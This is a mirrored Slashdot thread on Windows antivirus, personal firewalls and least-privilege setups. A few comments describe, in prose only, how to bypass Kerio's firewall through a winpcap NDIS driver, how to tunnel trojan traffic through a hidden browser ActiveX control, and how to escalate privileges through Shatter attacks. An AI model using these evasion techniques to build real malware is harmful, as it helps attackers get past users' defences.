Slashdot Mirror

← Back to Stories (view on slashdot.org)

Virus Scanners and Process Authentication for Windows?

Posted by Cliff on from the improved-reliability-in-redmond-OSes dept.

cavedwler asks: "Like alot of people, for one reason or another, I still have Windows running on one of my PC's and have the standard virus scanner and wondered if that is enough. I ran across this site and found a program that seems to work well in conjunction with any virus scanner. It blocks any executable or script from running on your PC without your approval. It is not a virus scanner as it does not search for viruses but just does not allow them to run. It also has the ability to monitor files and restore them in real time if they have been modified. I have been running it for a while now and am thinking of recommend it to my boss for use at work. I was wondering if anyone else out there had tried this, or other programs similar to it, in a real world environment and had any problems or successes."

23 comments

  1. SecureEXE by itwerx · · Score: 2, Interesting

    Sounds a lot like SecureEXE.

  2. theoretically by thexaspect · · Score: 2, Informative

    while this sounds great in theory, if your virus software is as up to date as it should be on an important box, then how would these scripts be a problem? i've had outlood running on my desktop for YEARS and have received at least one email that contained all of the "famous" virus/scripts, and i've never had a problem. if you have your software set to NOT OPEN ANYTHING you dont tell it to, you dont have a problem. save your IT department some moeny and implement policies or some other such feature. just my 2 cents. . .

  3. I use AVG + ZoneAlarm + Ad-aware by rhild · · Score: 5, Informative
    The combination of: will keep your Windows box free of all sorts of nasty things for FREE.
    1. Re:I use AVG + ZoneAlarm + Ad-aware by alyandon · · Score: 2, Interesting

      s/ZoneAlarm/Kerio Personal Firewall/g

      http://www.kerio.com/

      Much more powerful than ZoneAlarm.

    2. Re:I use AVG + ZoneAlarm + Ad-aware by Permission+Denied · · Score: 4, Informative
      Funny thing about Kerio is that it works by hooking calls into wsock32.dll. You can write a simple program that does not use winsock and it bypasses Kerio.

      Download winpcap. Unlike Unix libpcap, it includes both functions to create packets as well as capture them. It does not use winsock but rather installs an NDIS driver that sits lower in the TCP stack. You can then write a simple program that listens for packets and then manually constructs packets with UDP/TCP headers and sends them out. Completely bypasses Kerio.

      If you'd like, I can post the code. I tested this about a month ago and it worked against the latest version of Kerio Personal Firewall. Took about an hour of work for a proof-of-concept program. You could get really crazy and implement a TCP stack in userspace and then write all kinds of trojans that would bypass TPF. Only works with privileged accounts since you need permissions to install an NDIS driver, but outside of controlled corporate environments, all Windows users use the Administrator account anyway.

      Sygate and ZoneAlarm both install low-level NDIS drivers and are not susceptible to this attack. (At least I couldn't figure out how to bypass them - it may be possible to install a TDI hook which sits below NDIS, but this looks like months of work.)

      Other than that, TPF really is much nicer than Sygate or ZoneAlarm, but this is a pretty gaping hole. I'd recommend Sygate over ZoneAlarm.

    3. Re:I use AVG + ZoneAlarm + Ad-aware by Anonymous Coward · · Score: 1, Interesting

      all Windows users use the Administrator account anyway.

      I don't. I never log in as Administrator (or as an account in the Admiistrators group) on my windows box, just as I don't log in as root on my *BSD boxes.

      Just because you don't know how to operate in a windows environment, that doesn't mean that everybody doesn't know. "Runas" is your friend.

    4. Re:I use AVG + ZoneAlarm + Ad-aware by bedessen · · Score: 2

      Actually I think the preferred method for busting through software firewalls these days is just to co-opt a trusted program to do your communications for you. For example, consider a virus/trojan like BUGBEAR or SOBIG, which deploy in stages and often communicate to various hard-coded web URLs for further instructions. All you need to do is create an IE ActiveX control (or script the actual iexplore.exe) and hide its window off-screen or something, and use it to do your http connections... the firewall will allow it through since it's under the context of the browser.

      It all basically boils down to the fact that 99% of people run windows as an administrator, barring corporate environments. If you have administrative privileges you can do just about everything (including adding/removing/starting/stopping services & NDIS adaptors, killing processes, etc.) so the virus might as well just disable the firewall rather than trying to work around it. And if you don't have admin rights, as long as the virus scanner has any kind of user interface that runs from a privileged account (remember that all services run as LOCALSYSTEM by default), you can use one of the Shatter vulnerabilities and gain instant admin access. A lot of people 'poopoo-ed' that vulnerability by saying "this requires local access to the box, and even then it just gives you local admin access" but that's exactly the scenario we're talking about here, and it's the perfect way for a virus/trojan to gain the privileges it needs to hide itself.

      I trust software firewalls about as far as I can throw them... that is to say, I don't.

    5. Re:I use AVG + ZoneAlarm + Ad-aware by Anonymous Coward · · Score: 0

      Then you'll struggle to run older MS apps such as Office97 which refuse to run on Win2k and XP unless the user is in the Administrator group.

      There are any number of similar problems which crop up which means that a LOT of smaller organisations have general users logged on as admins.

    6. Re:I use AVG + ZoneAlarm + Ad-aware by n0-0p · · Score: 1

      Incorrect.
      You have to open permissions on a few directories and (ocassionally) files to make them writeable, but that's it. The easiest way to do this is lock up write access to everything and audit all access failures. Then log on as a normal user and play away. When something fails, view the security log as an admin and you'll see what you need to open up. After you have a list you can automate this for other systems with a cmd script and cacls.
      Several years ago I ran a Windows network with several thousand users and only 5 administrative users. Everyone else was a normal user with the minimum necessary priveleges on the system. We hand tweeked file and directory permissions beyond the defaults and had everything locked up very tightly, even with applications like Office 97. I will admit that there were a few applications that gave us serious headaches (older versions of Corel Draw for example) but overall there were few issues.
      There seems to be some stupid myth that a windows box requires less expertise to administer than a *nix box. Honestly, I'd say that it takes at least as much skill, if not more, to properly admin Windows. The OS is simply not as mature from a security standpoint. This is evidenced in areas like default file permissions, services, and enumeration information. All of this can be properly locked down but it requires significant knowledge to do it and can be very situationally dependent. The more recent versions of Microsoft software, however, show that this is finally sinking in and they are improving the defaults and eliminating unnecessary holes.

    7. Re:I use AVG + ZoneAlarm + Ad-aware by n0-0p · · Score: 1

      You're off on the shatter vulnerability.
      Microsoft's patch removed the WM_TIMER message. Also, on an unpatched box, it will not work if the application has a WM_TIMER handler, which is a trivial fix to implement in source.
      Even if the application is vulnerable, making the exploit work reliably is not trivial, and is different for each version of each application. It's feasible, but a lot more difficult than you imply.

  4. These programs work... by alyandon · · Score: 4, Insightful

    but do you really need them? Stuff like that tends to confuse the non-technical user types.

    I find it far more effective to make sure that people aren't running as privileged users under NT. If they aren't running as a privileged user and you have a decent virus scanner that has up to date definitions you'll take care of 99.9% of the threats out there. Worst case scenario... some virus/worm wipes out the user's documents folder.

    It really isn't that hard to properly secure NT/2000/XP... I just rarely see the IT staff of most companies bothering to do it.

    1. Re:These programs work... by ColaMan · · Score: 2, Insightful

      Worst case scenario... some virus/worm wipes out the user's documents folder.
      or, some virus/worm wipes out the 30GB of corporate data that's on a mapped drive that the user has read/write access to....

      --

      You are in a twisty maze of processor lines, all alike.
      There is a lot of hype here.
  5. I wonder by Rares+Marian · · Score: 1

    What if this software recorded a category and you could choose what category of software you wanted to run? No more clicking on the should this run dialog.

    What an idea? Maybe something could be put into a permissions file. Oh wait...

    --
    The message on the other side of this sig is false.
  6. Small problem.. by ewhenn · · Score: 2, Funny

    ... it always prompts me it i REALLY want to run SexDialer.exe Of course I do! This bug needs to be fixed!

  7. The idea is neat IF... by floydman · · Score: 2, Insightful

    and only if the ppl at your work know what they are doing. I used to work in a company where some employess saw the "Download the magical executable and see her ride" ,and they would (the employees i am talking about are programmers actually, or so called, i am sad to say). So it might be good for you, or your boss, who know what your are doing, but dont assume every one is as smart my pal. God created stupidty to haunt us.... FOREVER..:)

    --
    The lunatic is in my head
    1. Re:The idea is neat IF... by KingRamsis · · Score: 1

      Hey, !!
      I actually work in place so similar to the one you are talking about...
      ;-)

    2. Re:The idea is neat IF... by floydman · · Score: 1

      You should abandon ship at once, leaving the rest of the crew who cant look up the word abandon from the dictionary....

      --
      The lunatic is in my head
  8. some viruses are not directly executable programs by wotevah · · Score: 1

    Some viruses (actually, most) do not come in the directly executable flavor any more, I think.

  9. And slow by phorm · · Score: 1

    I found that one of my biggest beefs with ZoneAlarm is the sheer lag it impeded upon my connections. Not that it's a bad product, I found it extremely useful for locking certain apps from internet access (non-infected apps that liked to "call home") - but when I switched to using an old PC as a routing server things become much faster.

    Of course, back then I didn't know IPtables... but there are other solutions that do just as well. 486's with dual-NICS can run as these... but hell an older P1 will handle it very nicely and you can find peopel giving them away now.

    Of course, ad-aware will always be my friend... and I'm using Norton (just the AV, not the drain-your-resources-suite) so I can't comment on AVG until I try it out later (when my norton subscription runs out, most likely).

  10. Spybot also by antdude · · Score: 1

    Link.

    --
    Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
  11. Trojan Defense System is better by leonbrooks · · Score: 2, Interesting

    Australian made and amazingly comprehensive, especially under the hood.

    --
    Got time? Spend some of it coding or testing
  12. Alot of people? by You're+All+Wrong · · Score: 1

    Like alarge number of people, for along time there's been one
    particular mistake by others at the top of alist of things
    that annoy me. Why can't people be alittle more careful with
    their grammar? One has to draw aline somewhere, don't be aloser.

    YAW.

    --
    Your head of state is a corrupt weasel, I hope you're happy.